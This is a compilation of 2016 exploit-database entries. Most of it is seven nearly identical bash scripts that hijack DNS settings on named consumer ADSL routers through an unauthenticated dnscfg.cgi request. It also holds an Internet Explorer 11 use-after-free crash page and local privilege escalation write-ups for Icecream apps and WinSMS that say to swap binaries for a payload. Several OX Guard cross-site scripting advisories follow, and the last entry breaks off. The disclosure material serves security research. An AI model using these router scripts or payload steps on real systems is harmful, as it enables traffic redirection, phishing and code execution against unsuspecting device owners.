Attached is a Proof of Concept Python script, which connects to the COM1 serial port, and sends an EMFSPOOL structure containing a font file with the NAME table length set to 0xAAAAAAAA. When launched in a guest system, it should trigger the crash shown above in the vprintproxy.exe process on the host. The script is a slightly reworked version of Kostya's original exploit.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40398.zip
#!/bin/bash
#
# Exper EWM-01 ADSL/MODEM
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Exper EWM-01 ADSL MODEM/ROUTER"
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
#!/bin/bash
#
# Inteno EG101R1 VoIP Router
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Inteno EG101R1 VoIP Router "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
#!/bin/bash
#
# PIKATEL 96338WS, 96338L-2M-8M Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " PIKATEL 96338WS, 96338L-2M-8M ADSL Router "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
#!/bin/bash
#
# PLANET VDR-300NU ADSL ROUTER
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " PLANET VDR-300NU ADSL ROUTER "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
#!/bin/bash
#
# Tenda ADSL2/2+ Modem 963281TAN
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Tenda ADSL2/2+ Modem 963281TAN "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
#!/bin/bash
#
# COMTREND ADSL Router CT-5367 C01_R12, CT-5624 C01_R03
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " COMTREND ADSL Router CT-5367 C01_R12, CT-5624 C01_R03"
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
#!/bin/bash
#
# ASUS DSL-X11 ADSL Router Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " ASUS DSL-X11 ADSL Router "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="0" />
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
<meta http-equiv="Pragma" content="no-cache" />
<style type="text/css">
body{
background-color:lime;
font-color:red;
};
</style>
<script type='text/javascript'></script>
<script type="text/javascript" language="JavaScript">
/*
# Exploit Title: Internet Explorer 11 Use After Free
# Date: 05/09/2016 - 11/09/2016
# Exploit Author: Marcin Ressel
# Vendor Homepage: https://www.microsoft.com/pl-pl/
# Version: 11.0.9600.18482
# Tested on: Windows 7 (x64)
######################################################################################
0:014> g
(13a8.9b8): Access violation - code c0000005 (!!! second chance !!!)
eax=2f66abb0 ebx=00000001 ecx=2fbc8f08 edx=7ef8d000 esi=2fbc8f08 edi=2fbc8f08
eip=6d754a45 esp=1feac660 ebp=1feac674 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!CElement::SecurityContext+0x25:
6d754a45 8b80b8000000 mov eax,dword ptr [eax+0B8h] ds:002b:2f66ac68=????????
0:014> d @eax
2f66abb0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abc0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abd0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abe0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abf0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac00 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac10 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac20 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0:014> kb
ChildEBP RetAddr Args to Child
1feac660 6d5e7c69 6d5e7500 1feac690 2fbc8f08 MSHTML!CElement::SecurityContext+0x25
1feac674 6d5e75cf 2fbc8f08 2fbc8f08 2fbc8f08 MSHTML!CMediaElement::RemoveFromPlayToElementTracker+0x1d
1feac688 6d5e7bee 1feac6a0 6d5e7bd0 00000004 MSHTML!CMediaElement::Shutdown+0xdc
1feac698 6d5e7b1c 48cfae30 50d00bb0 4542dbd0 MSHTML!CMediaElement::OnMarkupTearDown+0x1e
1feac6c4 6d3b23dc 00000000 4542dbd0 50d00bb0 MSHTML!CMarkup::InvokeMarkupTearDownCallbacks+0xc0
1feac6d8 6d3b22c9 00000001 00000001 341a8bb0 MSHTML!CMarkup::TearDownMarkupHelper+0xe4
1feac700 6d3adf1f 00000001 00000001 1feac7d0 MSHTML!CMarkup::TearDownMarkup+0x58
1feac7b0 6dae9665 341a8bb0 00000000 00000000 MSHTML!COmWindowProxy::SwitchMarkup+0x4eb
1feac894 6dae97e3 00005004 ffffffff 00000000 MSHTML!COmWindowProxy::ExecRefresh+0xa1c
1feac8a8 6d0d763b 457f1f68 00005004 00000001 MSHTML!COmWindowProxy::ExecRefreshCallback+0x23
1feac8f0 6d0cd4e2 91c55b56 00000000 6d0cc800 MSHTML!GlobalWndOnMethodCall+0x17b
1feac944 76b862fa 001401c6 00008002 00000000 MSHTML!GlobalWndProc+0x103
1feac970 76b86d3a 6d0cc800 001401c6 00008002 user32!InternalCallWinProc+0x23
1feac9e8 76b877d3 00000000 6d0cc800 001401c6 user32!UserCallWinProcCheckWow+0x109
1feaca4c 76b8789a 6d0cc800 00000000 1feafc28 user32!DispatchMessageWorker+0x3cb
1feaca5c 6e5fa8ac 1feaca9c 62382e48 2efb2fe0 user32!DispatchMessageW+0xf
1feafc28 6e620e88 1feafcf4 6e620b00 5cba2ff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
1feafce8 74e4ad3c 62382e48 1feafd0c 6e614b00 IEFRAME!LCIETab_ThreadProc+0x3e7
1feafd00 6e593a31 5cba2ff0 00000000 6e5939a0 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c
1feafd38 6fae9608 4b3b6fe8 705e0368 00000000 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
############################################################################################
*/
var doc;
var trg, trg_parent;
function testcase()
{
var e1_frame = document.getElementById("e1");
doc = document;
e = e1_frame.contentWindow.document.createElement("hr");
rf = doc.body.appendChild(e);
e = e1_frame.contentWindow.document.createElement("audio");
rf = doc.body.appendChild(e);
dom = doc.getElementsByTagName("*");
document.getElementById("e1").removeNode(true);
trg = dom[14];
trg_parent = doc.body;
trg.addEventListener('DOMNodeRemoved',
new Function('',
//'try{trg.removeEventListener("DOMNodeRemoved",this,false);}catch(e){}'+
'try{trg.appendChild(document.createElement("feOffset")).removeNode(false).ATTRIBUTE_NODE = "false";}catch(e){}'+
'try{trg_parent = trg.cloneNode(true);}catch(e){}'//+
// 'try{doc = document.implementation.createDocument("about:blank","","text/html");}catch(e){}'
),
false);
trg_parent.innerHTML = trg.innerHTML;
//CollectGarbage();
//trg.innerHTML = "<h1></h1>"
setTimeout('location.reload();',700);
}
</script>
<title>Use After Free</title>
</head>
<body onload='testcase();'>
<iframe></iframe><iframe src='about:blank' id='e1'></iframe>
</body>
</html>
</html>
# Exploit Title: Multiple Icecream Apps Local Privilege Escalation
# Date: 13/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: icecreamapps.com
# Software Versions Affected: Icecream Ebook Reader 4.21 | Icecream Screen Recorder 4.21 | Icecream Screen Recorder 2.12
# Software Link: http://icecreamapps.com/Ebook-Reader/ | http://icecreamapps.com/Screen-Recorder/ | http://icecreamapps.com/Slideshow-Maker/
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86
1. Description:
The default installation directory for Icecream Ebook Reader is "C:\Program Files (x86)\Icecream Ebook Reader" with weak folder permissions that grants EVERYONE change/modify
privileges to the contents of the directory and it's subfolders. This allows an attacker opportunity for their own code execution under any other user running the
application. The same vulnerability exists for "Icecream Screen Recorder" as well as "Icecream Slideshow Maker".
2. Proof
C:\Program Files (x86)>icacls "Icecream Ebook Reader"
Icecream Ebook Reader Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
C:\Program Files (x86)>icacls "Icecream Screen Recorder"
Icecream Screen Recorder Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
C:\Program Files\Icecream Slideshow Maker Everyone:(OI)(CI)C
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(special access:)
GENERIC_READ
GENERIC_EXECUTE
BUILTIN\Power Users:C
BUILTIN\Power Users:(OI)(CI)(IO)C
BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
TULPA-842269BBB\Administrator:F
CREATOR OWNER:(OI)(CI)(IO)F
3. Exploit:
Simply replace any of the application exe's or any of the dll's with your preferred payload and wait for execution.
# Exploit Title: WinSMS 3.43 Local Privilege Escalation
# Date: 13/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.winsms.co.za
# Software Link: https://www.winsms.co.za/products/bulk-sms-desktop-software/
# Version: Software Version 3.43, Released September 2015
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86
1. Description:
WinSMS installs by default to "C:\Program Files (x86)\WinSMS" with very weak folder permissions granting any user full permission to the contents of the directory and it's subfolders. This allows ample opportunity for code execution against any other user running the application. WinSMS is typically configured as a startup program which makes this particularly easy to take leverage.
2. Proof
C:\Program Files>cacls WinSMS
C:\Program Files\WinSMS Everyone:(OI)(CI)F
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(special access:)
GENERIC_READ
GENERIC_EXECUTE
BUILTIN\Power Users:C
BUILTIN\Power Users:(OI)(CI)(IO)C
BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
TULPA-842269BBB\Administrator:F
CREATOR OWNER:(OI)(CI)(IO)F
3. Exploit:
Simply replace WinSMS.exe or any of the dll's with your preferred payload and wait for execution.
4. Plain Text Password Disclosure:
It is worth noting that sensitive information such as the proxy server password is stored in plain text within the a database file located at "C:\Program Files (x86)\WinSMS\WinSMS.mdb"
Product: OX Guard
Vendor: OX Software GmbH
Internal reference: 47878 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: Benjamin Daniel Mussler (@dejavuln)
Vendor notification: 2016-08-03
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6854
CVSS: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code which got injected to a mail with inline PGP signature gets executed when verifying the signature.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Add JS code to a mail body
2. Use PGP inline signatures
3. Open the mail in OX App Suite
Solution:
Users should not open mail from untrusted sources. We made sure that the verified content does not get handled in a way that code can get executed. Operators should update to the latest Patch Release.
Internal reference: 47914 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: secator
Vendor notification: 2016-08-05
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6853
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code and references to external websites can be injected to the names of PGP public keys. When requesting that key later on using a specific URL, such script code might get executed. In case of injecting external websites, users might get lured into a phishing scheme.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. As attacker, create a PGP key with malicious name
2. Get the key ID and create a link which will fetch that key
3. Make the victim call that link
Solution:
Users should not click links from untrusted sources. We now sanitize the returned key and make sure HTML content does not get interpreted by the browser. Operators should update to the latest Patch Release.
Internal reference: 48080 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 2.4.2 and earlier
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.4.0-rev11, 2.4.2-rev5
Researcher credits: Benjamin Daniel Mussler (@dejavuln)
Vendor notification: 2016-08-15
Solution date: 2016-08-18
Public disclosure: 2016-09-13
CVE reference: CVE-2016-6851
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code can be provided as parameter to the OX Guard guest reader web application. This allows cross-site scripting attacks against arbitrary users since no prior authentication is needed.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.) in case the user has a active session on the same domain already.
Steps to reproduce:
1. As attacker, create a hyperlink with script code included at the "templid" parameter
2. Make the victim open that link
Solution:
Users should not click links from untrusted sources. We now sanitize the returned content for this parameter. Operators should update to the latest Patch Release.
Product: OX App Suite
Vendor: OX Software GmbH
Internal reference: 46484 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
